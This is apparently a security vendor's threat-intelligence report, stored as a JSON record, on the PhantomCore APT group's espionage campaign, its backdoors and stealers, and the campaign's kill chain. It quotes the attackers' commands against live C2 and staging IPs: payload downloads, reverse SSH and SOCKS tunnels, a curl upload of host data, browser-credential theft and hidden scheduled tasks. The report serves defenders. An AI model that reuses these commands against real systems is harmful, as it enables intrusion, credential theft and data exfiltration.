{
	"id": "1452498e-337b-4e86-8381-6b58c7fd2109",
	"created_at": "2026-04-10T03:21:02.991838Z",
	"updated_at": "2026-04-10T03:22:19.178728Z",
	"deleted_at": null,
	"sha1_hash": "caee5f1ec4aeac2d66389622cccc85bb0aabefe3",
	"title": "Phantom pains: a large-scale cyberespionage campaign and a possible split within the PhantomCore APT group",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 928356,
	"plain_text": "Phantom pains: a large-scale cyberespionage campaign and a possible\r\nsplit within the PhantomCore APT group\r\nBy Positive Technologies\r\nPublished: 2025-09-09 · Archived: 2026-04-10 02:54:35 UTC\r\nAnalysis of tools\r\n1.    PhantomRAT\r\nPhantomRAT is a Go written backdoor delivered as a PE executable at the first phase of the cyberattack to gain initial access\r\nand download the following payload: PhantomTaskShell, PhantomProxyLite, MeshAgent, and RSocx.\r\nThe backdoor does not use persistence techniques on the infected host.\r\nDefense Evasion\r\nTo detect debugging, virtualization, and analysis tools, PhantomRAT calls the WinAPI function IsDebuggerPresent()\r\nand checks the Windows registry keys DriverDesc and SYSTEM\\ControlSet001\\Services\\Disk for the string \"vmware\".\r\nDiscovery\r\nPhantomRAT collects the following information on the infected host:\r\nParameter Description Collection method\r\nhost Host name Calling the golang function os.Hostname()\r\nuser Username\r\nRetrieving the value of the USERNAME environment\r\nvariable by calling the golang function os.Getenv()\r\ndomain Domain\r\nRetrieving the value of the USERDOMAIN environment\r\nvariable by calling the golang function os.Getenv\r\nlocal_ip\r\nHost IP address\r\non the local network\r\nCalling the golang function net.InterfaceAddrs()\r\npublic_ip Host external IP address Sending a request to the external service https://ident.me\r\nCommand and Control\r\nPhantomRAT checks connectivity to the C2 server:\r\nGET /connect\r\nand sends JSON with host details:\r\n \r\nPOST /init\r\nJSON with information about the infected system\r\nNext, PhantomRAT regularly polls the C2 server for commands to execute on the compromised host:\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/\r\nPage 1 of 22\n\nPOST /command\r\nThe C2 server replies with JSON containing a Response field, which includes the command type (cmd_id)\r\nand the command data (cmd_data) to execute on the host.\r\nJSON with information about the command\r\nThe command‑type parameter (cmd_id) can take several values:\r\nCommand Purpose\r\nUp Download a file from a remote host to the hardcoded directory C:\\ProgramData\\\r\nEx\r\nRun the command passed in cmd_data in the Windows command line interpreter as cmd\r\n/s /c \"\u003ccmd_data\u003e | cmd\"\r\nSt\r\nRun a process on the infected host (for example, a previously downloaded file): cmd.exe\r\n/C start \"\u003ccmd_data\u003e\"\r\nPhantomRAT sends command execution results in a similarly structured JSON object:\r\n \r\nPOST /out\r\nJSON object with the command execution results\r\nThe PhantomRAT code also includes a function that checks the connection with the C2 server:\r\nPOST /check\r\nHowever, regardless of the outcome, the backdoor doesn't perform any action. This looks like a test function and is likely\r\nstill under development.\r\nDetected samples:\r\nc34fb316e7b60cff25be9c86e5736b802b9e99b1ac29daa03b08c3435b6ada8c\r\n278f051832c4b2c95ba899d685478bd3430f74d21aea367377cc17788c3a5638\r\nc67cf425d688bba6dbe00e6d86a501f6978664ff99c1811c7104f4a3f4b7e884\r\n31cc62a06720e0c20f03e0cb912bb92b20e5f339ae9c7280b235f63ac35eda9a\r\n9287fd8adc333469eabe655ccf13b78e1abb6e42c0cc6817ae66372fb126a683\r\nKey characteristics:\r\nPE executable written in Go\r\nNo persistence techniques\r\nUses defense evasion techniques\r\nCollects a broad range of host information\r\nSupports multiple action types on the compromised host\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/\r\nPage 2 of 22\n\nNo encryption for data being transferred\r\nHardcoded constant: path C:\\ProgramData\r\n2.    PhantomRShell\r\nPhantomRShell is a C++ backdoor delivered as a DLL. It's used in the first stage of the cyberattack to gain initial access\r\nand to download the following payload: PhantomTaskShell, PhantomProxyLite, MeshAgent, and RSocx.\r\nThe backdoor does not implement Persistence or Defense Evasion techniques.\r\nDiscovery\r\nPhantomRShell uses WinAPI functions to collect the following information about the compromised host:\r\nParameter Description Collection method\r\nGUID Identifier Calling the CoCreateGuid() WinAPI function\r\nhostname Host name Calling the GetComputerNameW() WinAPI function\r\nAD Domain Calling the GetComputerNameExW() WinAPI function\r\nIn case of an error, the string UNKNOWN is used as a parameter value.\r\nNext, the following working directories are created: C:\\ProgramData\\YandexCloud or C:\\ProgramData\\MicrosoftAppStore.\r\nCommand and Control\r\nIn requests to the C2 server, the User-Agent header is set to one of the following:\r\nYandexCloud/1.0\r\nMicrosoftAppStore/2001.0\r\nPhantomRShell makes three attempts to connect to the C2 server. If all fail, the backdoor sleeps for 10 seconds and retries.\r\nOnce connected, PhantomRShell transfers host information to the server.\r\nGET /poll?id=\u003cGUID\u003e\u0026hostname=\u003chostname\u003e\u0026domain=\u003cAD\u003e\r\nUser-Agent: YandexCloud/1.0\r\nNext, PhantomRShell receives commands from the C2 server to run on the compromised host, in one of the following\r\nformats:\r\nCommand Purpose\r\ncmd:\u003ccmd_data\u003e|\r\n\u003ccmd_ID\u003e    \r\nExecute the cmd_data command in the Windows command line\r\ninterpreter in the form:\r\ncmd.exe /C \u003ccmd_data\u003e\r\ndownload:\u003c cmd_data \u003e|\r\n\u003ccmd_ID\u003e\r\nDownload a file from a remote host into one of the previously created\r\ndirectories:\r\n— C:\\ProgramData\\YandexCloud\r\n— C:\\ProgramData\\MicrosoftAppStore\r\nThe command execution results are returned to the C2 as JSON in the result field. When a command to download a file from\r\na remote host is executed, the result field contains either Download successful:\u003cpath\u003e or Download failed, depending\r\non whether the download succeeded:\r\n \r\nPOST /result\r\nUser-Agent: YandexCloud/1.0\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/\r\nPage 3 of 22\n\nJSON object with the command execution results\r\nDetected samples:\r\ned9b24a77a74cd34c96b30f8de794fe85eb1d9f188f516bd7d6020cc81a86728\r\n4c78d6bba282aaff0eab749cfa8a28e432f7cbf9c61dec8de8f4800fd27e0314\r\n204544fc8a8cac64bb07825a7bd58c54cb3e605707e2d72206ac23a1657bfe1e\r\n413c9e2963b8cca256d3960285854614e2f2e78dba023713b3dd67af369d5d08\r\nb683235791e3106971269259026e05fdc2a4008f703ff2a4d32642877e57429a\r\nbe14fc604c840c3afff9542106c73ed247417de5a56b1e9b2843e7947f0722d9\r\n01f12bb3f4359fae1138a194237914f4fcdbf9e472804e428a765ad820f399be\r\nKey characteristics:\r\nDynamic-link library (DLL) written in C++\r\nNo persistence techniques\r\nNo defense evasion techniques\r\nSupports multiple action types on the compromised host\r\nCollects a broad range of host information\r\nNo encryption for data being transferred\r\nUses specific User-Agent values\r\nHardcoded constant: C:\\ProgramData\\YandexCloud\r\nHardcoded constant: path C:\\ProgramData\\MicrosoftAppStore\r\nImpersonates software from Russian IT vendors\r\n3.    PhantomTaskShell\r\nPhantomTaskShell is a PowerShell backdoor used across all post—Initial Access stages of the cyberattack to let operators\r\ncontrol infected hosts via the Phantom control panel and to download the following payload: PhantomStealer, OpenSSH,\r\nXenArmor All In One Password Recovery Pro, and Rclone.\r\nOn first launch, PhantomTaskShell creates update_id.txt on the infected host and writes in it the GUID value generated via\r\nthe [System.Guid]::NewGuid() function.\r\nFor persistence, a Windows Task Scheduler job named SystemAdminAgent_\u003cGUID\u003e that runs PhantomTaskShell\r\nfor 9,999 days, regardless of power source (battery or AC), is registered on the infected host. On each run,\r\nPhantomTaskShell checks for the update_id.txt file containing GUID.\r\nIf the update_id.txt file is missing (first run), PhantomTaskShell registers the infected host in the Phantom panel by sending\r\nthe GUID and the hostname (obtained from the COMPUTERNAME environment variable) to the C2 server:\r\n \r\nPOST /api/clients\r\nJSON object with information about the infected host\r\nNext, PhantomTaskShell polls the Phantom control panel every 60 seconds for commands to execute on the infected host.\r\n \r\nGET /api/clients/GUID/commands\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/\r\nPage 4 of 22\n\nCommand request code\r\nThe C2 server returns a list where each item starts with \"Pending:\" followed by the command to run on the infected host.\r\nList of commands obtained from C2\r\nCommand execution code on the infected host\r\nPhantomTaskShell sends the command execution results back to the same URL as JSON.\r\nJSON with the command execution results\r\nAll PhantomTaskShell actions are logged to update.log on the infected host.\r\nConstants in the PhantomTaskShell code\r\nDetected sample:\r\n9f9acdd833f3fd7b8bf987a8cc17e9456546fdcbcfe80c3b0dfc57c6f62d3e4b\r\n4.    PhantomStealer\r\nPhantomStealer is an infostealer written in Go, used during the Credential Access stage. It targets authentication data saved\r\nin Yandex Browser, Google Chrome, and Discord. It isn't an open source utility but contains usage instructions.\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/\r\nPage 5 of 22\n\nInfostealer usage instruction\r\nRun settings:\r\nprogram: software to process (Yandex Browser, Google Chrome, or Discord).\r\nModes of use:\r\n-c: export authentication data\r\n-d: import authentication data\r\nIn export mode, the infostealer extracts, decrypts, and saves authentication data for each supported software to separate files,\r\nthen packages them into a single ZIP archive:\r\nYandex Browser: yandex-udak64.dat\r\nGoogle Chrome: chromecc16.dat\r\nDiscord: discord-key.dat\r\nThe import function—unusual for infostealers—likely helps PhantomStealer operators deal with the stolen accounts later.\r\nDetected sample:\r\nc3d05d7d6e1c50c6bd493fd5613c3204e6beadf8b6e4915cdf2f899fabf86a4e\r\n5.    PhantomProxyLite\r\nPhantomProxyLite is used at the Persistence and Defense Evasion stages. It sets up an SSH tunnel between\r\nthe compromised host and the C2 server to maintain reliable access to the victim network.\r\nPhantomProxyLite runs as a background service named SSHService. On first launch, it generates a random reverse port\r\nnumber for the C2 server (greater than 12559), stores it in the Windows registry at HKLM\\SOFTWARE\\SSHService,\r\nand calls it on each start.\r\nIn the C:\\Windows\\Temp directory, a file named config is created with SSH tunneling parameters for routing network traffic\r\nto the C2 server.\r\nWriting configuration parameters to a file\r\nPhantomProxyLite launches ssh.exe on the infected host with settings from the configuration file and the Windows registry,\r\nand establishes a reverse SSH tunnel to the proxy server on port 443, disguising malicious traffic as legitimate HTTPS.\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/\r\nPage 6 of 22\n\nStarting the ssh.exe client\r\nDetected samples:\r\nb701272e20db5e485fe8b4f480ed05bcdba88c386d44dc4a17fe9a7b6b9c026b\r\n2611121e4100b60e8644211bdc831144ba8b772d4d40e616864e7a723a9d7bf8\r\na2be4d9fdba560a4706ff8c4b32f092ef476f203c96e1b4afaf391cfe82aa533\r\n6.    XenArmor All-In-One Password Recovery Pro\r\nXenArmor All In One Password Recovery Pro is a commercial utility for recovering authentication data in Windows\r\noperating systems. The utility is used at the Credential Access stage.\r\nPhantomCore purchased the utility via a privileged Gold-status account registered on July 16, 2024 at netu@tuta[.]com.\r\nXenArmor license file\r\nTwo purchases were made from this account: on July 16, 2024, the 2023 version of the utility, observed at the start\r\nof the analyzed cyberespionage campaign; and on May 13, 2025, an updated version, likely intended for use in future\r\ncyberattacks in 2025–2026.\r\nPhantomCore account\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/\r\nPage 7 of 22\n\nPurchase of the utility, 2023\r\nPurchase of the utility, 2025\r\n7.    RClone\r\nRClone is an open source utility for synchronizing data between a local computer and cloud storage. Used by PhantomCore\r\nat the Exfiltration stage to pull data from infected hosts.\r\nThe RClone sample identified by the threat intelligence team, downloaded from one of the group's payload staging servers,\r\ncorresponds to version 1.69.1 of the utility, as confirmed by a hash sum match between the detected sample and the official\r\nrepository data.\r\nAccording to the configuration of the detected sample, PhantomCore uses a Mega[.]nz cloud storage account registered\r\nto mariaaa228@proton[.]me for data exfiltration.\r\nRClone configuration file\r\nKill chain, cyberattack TTP\r\n1. Initial Access\r\nTools:\r\nPhantomRAT\r\nPhantomRShell\r\nInfrastructure:\r\n195.58.54.39\r\n91.239.148.21\r\n188.127.254.44\r\n185.225.17.104\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/\r\nPage 8 of 22\n\nBackdoors are delivered as polyglot files, using, among other methods, hacked email accounts of legitimate Russian\r\ncompanies.\r\nMalicious email sent from a compromised mailbox carrying a PhantomRShell sample\r\nDetection in the PT Threat Intelligence Portal\r\n2. Persistence, Defense Evasion\r\nTools:\r\nPhantomTaskShell\r\nPhantomProxyLite\r\nMeshAgent\r\nOpenSSH\r\nRSocx\r\nInfrastructure:\r\naustolns.pw\r\nmgfoms.org\r\nnextcloud.soft-trust.com\r\nnextcloud.1cbit.dev\r\nnextcloud.trust-sec.it.com\r\nsoftline-solutions.cloud\r\n194.87.253.233\r\n213.232.204.110\r\n194.116.215.36\r\n46.8.71.104\r\n217.19.4.206\r\n91.239.148.211\r\n193.187.174.251\r\n185.130.251.227\r\n195.133.32.213\r\n193.187.174.3\r\n194.116.215.166\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/\r\nPage 9 of 22\n\n185.130.251.219\r\n88.66.89.231\r\n188.127.254.234\r\n91.219.151.103\r\n91.219.151.59\r\n45.8.228.253\r\n45.158.169.131\r\nProcedures:\r\nUsing PhantomRAT or PhantomRShell, download an archive with a MeshAgent sample from one of the group's\r\npayload staging servers, extract it, and create a Windows Task Scheduler task for its daily hidden execution at 10:00\r\na.m.\r\nDownloading MeshAgent from a VPS server\r\niwr -Uri \"http://188.127.254.234:443/remote.zip\" -OutFile \"C:\\ProgramData\\remote.zip\"\r\niwr -Uri \"http://188.127.254.234:80/dnsclient.zip\" -OutFile \"C:\\ProgramData\\dnsclient.zip\"\r\niwr -Uri http://188.127.254.234:80/inetpub.zip -OutFile C:\\ProgramData\\inetpub.zip\r\ncertutil.exe -urlcache -f http://188.127.254.234:80/remote.zip C:\\ProgramData\\remote.zip\r\nDownloading MeshAgent from a compromised site\r\nup https://\u003credacted\u003e/inetpub.zip C:\\ProgramData\\inetpub.zip\r\nDownloading MeshAgent from a phishing site with a fake CAPTCHA\r\npowershell -WindowStyle Hidden -Command \"\u0026 {iwr 'https://mgfoms.org/in.php?action=2' -OutFile '%userprofile%\\dnsclient.ex\r\nExtracting MeshAgent\r\nexpand-archive -force -path C:\\ProgramData\\inetpub.zip -destinationpath C:\\ProgramData\\\r\nexpand-archive -force -path C:\\ProgramData\\dnsclient.zip -destinationpath C:\\ProgramData\\\r\nCreating a task in the Windows Task Scheduler\r\nschtasks /create /sc DAILY /tn \\\"Microsoft Update\\\" /tr \\\"C:\\ProgramData\\YandexCloud\\dnsclient.bat\\\" /mo 1 /st 10:00\r\nschtasks /create /sc DAILY /tn \\\"Microsoft Update\\\" /tr \\\"C:\\ProgramData\\YandexCloud\\dnsclient.bat\\\" /st 10:00\r\nschtasks /create /sc DAILY /tn \\\"Microsoft Update\\\" /tr \\\"C:\\ProgramData\\YandexCloud\\dnsclient.bat\\\" /st 10:01 /f\r\nschtasks /create /sc DAILY /tn \\\"Yandex Update\\\" /tr \\\"powershell -WindowStyle Hidden -Command Start-Process 'C:\\ProgramDa\r\nschtasks /create /sc DAILY /tn DNS /tr \\\"powershell -WindowStyle Hidden -Command Start-Process 'C:\\ProgramData\\dnsclient.e\r\nschtasks /create /sc DAILY /tn DNS /tr \\\"powershell -WindowStyle Hidden -Command Start-Process 'C:\\ProgramData\\inetpub.exe\r\nUsing PhantomRAT or PhantomRShell, the OpenSSH client is downloaded from the official GitHub repository\r\nand installed, a reverse SSH tunnel is set up on port 80 (HTTP) or 443 (HTTPS) with passwordless and keyless\r\nauthentication, and a Windows Task Scheduler task is created to run it daily at 9:00 a.m.\r\nDownloading and installing the OpenSSH client\r\nmsiexec /qn /i https://github.com/PowerShell/Win32-OpenSSH/releases/download/v9.8.3.0p2-Preview/OpenSSH-Win64-v9.8.3.0.ms\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/\r\nPage 10 of 22\n\nOpenSSH directory listing\r\ndir \"C:\\Program Files\\OpenSSH\"\r\ndir \\\"C:\\Program Files\\OpenSSH\\\"\r\ndir C:\\windows\\system32\\Openssh\r\nViewing the SSH version\r\nssh -V\r\nCreating a SSH tunnel\r\nssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 37124 -p 80 vtvvuaweuvefafoe\r\nssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 31238 -p 443 vtvvuaweuvefafoe\r\nssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 37581 -p 443 cfyvg84df17842o@\r\nCreating a task in the Windows Task Scheduler\r\nschtasks /create /sc DAILY /tn SSH /tr \\\"C:\\Windows\\system32\\OpenSSH\\ssh.exe -o StrictHostKeyChecking=no -o ServerAliveIn\r\nschtasks /create /sc DAILY /tn Update /tr \\\"'C:\\Windows\\system32\\OpenSSH\\ssh.exe' -o StrictHostKeyChecking=no -o ServerAli\r\nUsing PhantomRAT or PhantomRShell, download an RSocx sample from a compromised legitimate site, extract it,\r\nand run it stealthily; establish a network connection to the C2 server on port 443 (HTTPS) or 8080 (HTTP) over\r\nthe SOCKS5 protocol :\r\nDownloading RSocx\r\nup https://\u003credacted\u003e/hosts.zip C:\\ProgramData\\hosts.zip\r\nExtracting RSocx\r\npowershell expand-archive -force -path \"C:\\\\ProgramData\\\\hosts.zip\" -destinationpath \"C:\\\\ProgramData\\\\\"\r\nStarting RSocx\r\nC:\\ProgramData\\hosts.exe -r 193.187.174.251:443\r\nC:\\ProgramData\\hosts.exe -r 195.133.32.213:8080\r\nstart /B \"\" \"C:\\\\ProgramData\\\\hosts.exe -r 193.187.174.251:443\"\r\nStart-Process -FilePath \"C:\\ProgramData\\hosts.exe\" -ArgumentList \"-r 193.187.174.251:443\" -NoNewWindow\r\nStart-Process -FilePath \\\"C:\\ProgramData\\hosts.exe\\\" -ArgumentList \\\"-r 193.187.174.251:443\\\" -NoNewWindow\r\nUsing PhantomRAT or PhantomRShell, a PhantomTaskShell sample is downloaded from a compromised site,\r\nextracted, and executed on the infected system:\r\nDownloading PhantomTaskShell\r\nup https://\u003credacted\u003e/update.zip C:\\ProgramData\\update.zip\r\nExtracting PhantomTaskShell\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/\r\nPage 11 of 22\n\nexpand-archive -force -path C:\\ProgramData\\update.zip -destinationpath C:\\ProgramData\\\r\nStarting PhantomTaskShell\r\npowershell C:\\ProgramData\\MicrosoftAppStore\\update.ps1\r\npowershell C:\\ProgramData\\YandexCloud\\update.ps1\r\n3. Credential Access\r\nTools:\r\nXenArmor All-In-One Password Recovery Pro\r\nPhantomStealer\r\nInfrastructure:\r\n188.127.254.234\r\nProcedures:\r\nUsing PhantomTaskShell, which receives commands from the Phantom control panel, download the XenArmor All\r\nIn One Password Recovery Pro utility from a payload staging server, extract, and run it on the infected system with\r\nan option to write discovered and recovered authentication data to an HTML file, then remove the utility from\r\nthe system.\r\nDownloading XenArmor All-In-One Password Recovery Pro\r\niwr -Uri \"http://188.127.254.234:80/one.zip\" -OutFile \"C:\\ProgramData\\one.zip\"\r\nExtracting the utility\r\nexpand-archive -force -path C:\\ProgramData\\one.zip -destinationpath C:\\ProgramData\r\nStarting the utility with results written to an HTML file\r\nC:\\ProgramData\\XenAllPasswordPro.exe -a C:\\ProgramData\\\u003credacted\u003e.html\r\nDeleting the utility\r\ndel C:\\ProgramData\\one.zip\r\ndel C:\\ProgramData\\XenAllPasswordPro.exe\r\nUsing PhantomTaskShell, which receives commands from the Phantom control panel, download the PhantomStealer\r\nsample from a payload staging server, extract it, and run it on the infected system with an option to copy\r\nauthentication data saved in known web browsers, and remove the infostealer from the system.\r\nDownloading PhantomStealer\r\niwr -Uri \"http://188.127.254.234:80/browser.zip\" -OutFile \"C:\\ProgramData\\browser.zip\"\r\nExtracting PhantomStealer\r\nexpand-archive -force -path C:\\ProgramData\\browser.zip -destinationpath C:\\ProgramData\\\r\nStarting PhantomStealer\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/\r\nPage 12 of 22\n\nC:\\ProgramData\\browser.exe chrome -c\r\ncd C:\\ProgramData; .\\browser.exe yandex -c\r\nDeleting PhantomStealer\r\ndel \"C:\\ProgramData\\browser.exe\"\r\n4. Discovery, Lateral Movement\r\nTools:\r\nPhantomTaskShell\r\nInfrastructure:\r\n185.130.249.224\r\nProcedures (executed via the PhantomTaskShell backdoor, which receives tasks from the Phantom control panel):\r\nProcedure Command\r\nObtaining information about\r\nlocal users\r\nwhoami \r\nquser\r\nObtaining information about\r\nActive Directory groups\r\nand users\r\nnet user\r\nnet user /domain\r\nnet user \u003credacted\u003e /domain\r\nnet group /domain\r\nnet group \\\"Domain Admins\\\" /domain\r\n\u003credacted\u003e, \u003credacted\u003e | ForEach-Object { net user $_ /domain }\r\nCollecting OS and file system\r\ninformation\r\nsysteminfo\r\nwmic logicaldisk get caption\r\nObtaining information about\r\nsystem processes and services\r\nget-service\r\ntasklist\r\nAnalyzing Windows\r\nDefender configurations\r\nget-mppreference\r\nDirectory listing\r\ndir S:\\\r\ndir C:\\\r\ndir C:\\users\\\u003credacted\u003e\r\ndir C:\\users\\\u003credacted\u003e\\documents\r\ndir C:\\users\\\u003credacted\u003e\\downloads\r\ndir C:\\users\\\u003credacted\u003e\\desktop\r\ndir C:\\Users\\\u003credacted\u003e\\AppData\\Roaming\r\ndir C:\\ProgramData\r\ndir \\\"C:\\Program Files (x86)\\\"\r\npwd\r\nAnalyzing the network\r\nenvironment and routing\r\nparameters\r\narp -a\r\nipconfig\r\nroute print\r\nnestat -ano\r\nnslookup 127.0.0.1\r\nnslookup \u003credacted\u003e.ru\r\nping 10.64.70.172 -n 1\r\nping \u003credacted\u003e -n 2\r\nSending the information\r\nabout the infected system\r\nto the C2 server\r\nC:\\Windows\\System32\\curl.exe -v -F\r\n\"file=@C:\\ProgramData\\user_report.txt\" -F\r\n\"destinationPath=./user_report.txt\" http://185.130.249.224:80/upload\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/\r\nPage 13 of 22\n\n5. Collection, Exfiltration\r\nTools:\r\nRClone\r\nMega.nz storage\r\nInfrastructure:\r\n195.133.32.213\r\nProcedures:\r\nUsing PhantomTaskShell, which receives commands from the Phantom control panel, start the certutil.exe utility\r\nfrom Windows Certificate Services with the -urlcache and -f parameters and download an RClone sample and its\r\nconfiguration file from the C2 server on port 8000.\r\nProcedure Command\r\nDownloading RClone\r\ncertutil.exe -urlcache -f \"http://195.133.32.213:8000/srvhost.exe\"\r\n\"C:\\ProgramData\\srvhost.exe\"\r\nDownloading\r\na configuration file\r\ncertutil.exe -urlcache -f \"http://195.133.32.213:8000/wusa.conf\"\r\n\"C:\\ProgramData\\wusa.conf\"\r\nUsing PhantomTaskShell, which receives commands from the Phantom control panel, download a sample\r\nof an unknown PowerShell script from the C2 server's port 80 and extract it (we could not obtain it during\r\nthe research):\r\nProcedure Command\r\nDownloading the PowerShell\r\nscript\r\niwr -Uri \"http://188.127.254.234:80/load.zip\" -OutFile\r\n\"C:\\\\ProgramData\\\\load.zip\"\r\nExtracting the PowerShell\r\nscript\r\nexpand-archive -force -path C:\\ProgramData\\load.zip -destinationpath\r\nC:\\ProgramData\\\r\nUsing PhantomTaskShell, which receives commands from the Phantom control panel, run a PowerShell tool with\r\nthe script execution disabled and options -r (recursive search) and -e (list of file extensions). Collect Microsoft Office\r\nand text documents, image files, LNK files, and configuration files for RDP and OpenVPN connections.\r\nProcedure Command\r\nStarting\r\nthe PowerShell script\r\npowershell -ex bypass C:\\ProgramData\\load.ps1 -Path C:\\Users\\ -r -e\r\n\"pdf,xls,xlsx,doc,docx,txt,jpg,ovpn,rdp,lnk\"\r\nDeleting tools:\r\nProcedure Command\r\nDeleting tools\r\ndel \"C:\\ProgramData\\wusa.conf\"\r\ndel \"C:\\ProgramData\\srvhost.exe\"\r\ndel \"C:\\ProgramData\\load.ps1\"\r\ndel \"C:\\ProgramData\\load.zip\"\r\nDirectories used to store tools:\r\nC:\\ProgramData\\\r\nC:\\ProgramData\\YandexCloud\r\nC:\\ProgramData\\MicrosoftAppStore\r\nC:\\Windows\\system32\\OpenSSH\r\nTasks in the Windows Task Scheduler\r\nYandex Update\r\nMicrosoft Update\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/\r\nPage 14 of 22\n\nUpdate\r\nSSH\r\nDNS\r\nMimicking legitimate files in the tool names\r\nssh.exe\r\nhosts.exe\r\ninetpub.exe\r\nsrvhost.exe\r\nMalicious files:\r\ndnsclient.zip\r\ndnsclient.bat\r\ninetpub.zip\r\ninetpub.exe\r\nhosts.zip\r\nhosts.exe\r\nupdate.zip\r\nupdate.ps1\r\nremote.zip\r\nremote.exe\r\nremote.dll\r\nload.zip\r\nload.ps1\r\none.zip\r\none.exe\r\nxenallpassword.exe\r\nbrowser.zip\r\nbrowser.exe\r\nsrvhost.exe\r\nwusa.conf\r\nFile-based IoCs\r\nMD5 SHA-1 SHA-256\r\n75a26a138783032ee18dcfc713b1b34c 04d364d7cc98379352e89757d62521271cb410cb ed9b24a77a74cd34c96b30f8de794fe85eb1d9f18\r\nb586cf958334415777719bf512304fbd 775b7e726ba6cf6d9a6463a62797c97612018066 4c78d6bba282aaff0eab749cfa8a28e432f7cbf9c6\r\n7e52be17fd33a281c70fec14805113a8 6942e07e7d08781cba571211a08e779838e72e9a 204544fc8a8cac64bb07825a7bd58c54cb3e60570\r\n65967d019076e700deb20dcbc989c99c 49a18dc1d8f84394d3373481dbac89d11e373dbd 413c9e2963b8cca256d3960285854614e2f2e78db\r\nb49a7ef89cfb317a540996c3425fcdc2 d9a4fd39a55cd20d55e00d3cace3f637b8888213 b683235791e3106971269259026e05fdc2a4008f\r\nbe990a49fa1e3789ebc5c55961038029 851157c01da6e85ffa94ded7f42cab19aa8528d6 01f12bb3f4359fae1138a194237914f4fcdbf9e472\r\n20d4805eb8547e9b28672a31adbc3600 c679d9cffe1bd722c4ee78f63328833264c5257e be14fc604c840c3afff9542106c73ed247417de5a5\r\nMD5 SHA-1 SHA-256\r\n43651c96ed10637b5c0e454c32e4809a 8aa3394ced3fcc14004f51062c658c4967d0cc40 c34fb316e7b60cff25be9c86e5736b802b9e99b1ac\r\na0846758c1852d141f657dd6a01adcce 2f6c55acf5ed41321a4ac4d728e31b8ee02ff34f 31cc62a06720e0c20f03e0cb912bb92b20e5f339a\r\ne3493bced3a25d0bf61980cb797afca5 293bd87a7b909b13cad58833366adb2711cbcdcd 278f051832c4b2c95ba899d685478bd3430f74d21\r\n55b31d3ae389473e6aee7a9a41e21bd2 3e764cb46a922703d864b6055eeefd2beacb97c8 c67cf425d688bba6dbe00e6d86a501f6978664ff99\r\n5437e08743347bca0430689341198e57 efa8725598260e13647836abe2e500c089839839 9287fd8adc333469eabe655ccf13b78e1abb6e42c0\r\nMD5 SHA-1 SHA-256\r\ne58777bd5d52fe5ec4ea20ccd1b92c57 c059ee9b367a7e8cfdfcc2da3d9cc851c47f4ffd b701272e20db5e485fe8b4f480ed05bcdba88c386d\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/\r\nPage 15 of 22\n\nMD5 SHA-1 SHA-256\r\n33f3cb133c23760869244a322b386d77 57c983f14bf810236eddc067277ba9daeb7a2de7 2611121e4100b60e8644211bdc831144ba8b772d4\r\n10bbc42c0aa376ba0c53733f47c3d251 0d249e064f42cff0ec3deaff285811a14cffb8f1 a2be4d9fdba560a4706ff8c4b32f092ef476f203c96\r\nMD5 SHA-1 SHA-256\r\n996084dc1175befd223d495a10c0e9e9 5469ae3e42e962746e4671a5587fdc009e6f60fe 9f9acdd833f3fd7b8bf987a8cc17e9456546fdcbcfe8\r\nMD5 SHA-1 SHA-256\r\n27210561cccac29d590b2ecd60670ab8 ed6ab3142369a6707d55552f40c8a5efd705f15b c3d05d7d6e1c50c6bd493fd5613c3204e6beadf8b6\r\nMD5 SHA-1 SHA-256\r\n016ebfd9c774fac33ad95be75595e9e1 5fc484e0d81b5edd021e91407b7bd98b8a8d13f1 ad0e3a42120602534512ac4a4415a9fb867f0ecc71\r\na2481680fe6f44d8d5ce2397a300a85f a862e22462f721830df414be16595eb2f8900291 